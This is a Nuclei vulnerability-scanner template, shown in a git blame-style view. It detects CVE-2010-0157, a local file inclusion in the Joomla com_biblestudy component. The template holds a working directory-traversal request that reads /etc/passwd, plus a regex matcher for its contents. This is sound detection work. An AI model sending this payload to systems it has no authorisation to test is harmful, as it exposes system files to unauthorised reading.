nuclei-templates/cves/2010/CVE-2010-0157.yaml

27 lines
971 B
YAML
Raw Normal View History

2021-09-27 11:02:48 +00:00
id: CVE-2010-0157
info:
name: Joomla! Component com_biblestudy - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in the Bible Study (com_biblestudy) component 6.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter in a studieslist action to index.php.
remediation: Upgrade to a supported version.
2021-09-27 13:06:48 +00:00
reference:
2021-09-27 11:02:48 +00:00
- https://www.exploit-db.com/exploits/10943
- https://www.cvedetails.com/cve/CVE-2010-0157
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-0157
2021-09-27 11:02:48 +00:00
requests:
- method: GET
path:
2021-09-27 13:06:48 +00:00
- "{{BaseURL}}/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd"
2021-09-27 11:02:48 +00:00
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/13